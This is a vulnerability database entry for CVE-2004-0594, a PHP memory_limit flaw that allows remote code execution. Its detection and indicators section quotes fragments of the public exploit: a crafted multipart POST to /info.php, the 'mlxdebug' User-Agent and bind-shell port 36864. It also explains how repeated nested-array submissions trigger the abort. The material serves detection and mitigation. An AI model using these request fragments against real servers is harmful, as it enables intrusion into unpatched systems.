CVE-2004-0594
published 2004-07-27

Priority: P347, medium
CVSS 2.0: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
EXPLOIT
EPSS: 54.86% (98.9th percentile)

The memory_limit functionality in PHP 4.x up to 4.3.7, and 5.x up to 5.0.0RC3, under certain conditions such as when register_globals is enabled, allows remote attackers to execute arbitrary code by triggering a memory_limit abort during execution of the zend_hash_init function and overwriting a HashTable destructor pointer before the initialization of key data structures is complete.

Affected

13 ranges
Vendor | Product | Version range | Fixed in
avaya | converged_communications_server | |
debian | debian_linux | |
hp | hp-ux | |
hp | hp-ux | |
hp | hp-ux | |
hp | hp-ux | |
openpkg | openpkg | |
openpkg | openpkg | |
php | php | |
php | php | >= 4.0 < 4.3.7 | 4.3.7
trustix | secure_linux | |
trustix | secure_linux | |
trustix | secure_linux | |

Detection & IOCs (extracted from sources)

port: 36864
path: /info.php
command: POST /info.php?a[1]=test HTTP/1.0
other: Content-Type: multipart/form-data; boundary=------------ BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
  • Alert on inbound HTTP requests bearing the User-Agent string 'mlxdebug', which is hardcoded in the public exploit for CVE-2004-0594.
  • Monitor for unexpected outbound or inbound TCP connections on port 36864, which is the bind-shell port opened by the exploit's shellcode upon successful exploitation.
  • Detect multipart/form-data POST requests containing nested array form-field names (e.g., name="a[][]") sent in large quantities; the exploit uses repeated submissions of such requests to exhaust PHP memory and trigger the memory_limit abort.
  • The exploit targets PHP installations where register_globals is enabled; audit PHP configurations for 'register_globals = On' as a high-risk indicator of exploitability.
  • The vulnerability is only exploitable when the PHP 'memory_limit' configuration setting is enabled AND 'register_globals' is also enabled. Disabling either setting mitigates the attack vector.
  • The exploit requires the attacker to force the PHP interpreter to allocate more memory than the memory_limit setting before script execution begins; the attack is conditional on the memory_limit being reachable via attacker-controlled input.

CVSS provenance

nvd: v2.0, 5.1 MEDIUM, AV:N/AC:H/Au:N/C:P/I:P/A:P
vendor_redhat: 5.1 MEDIUM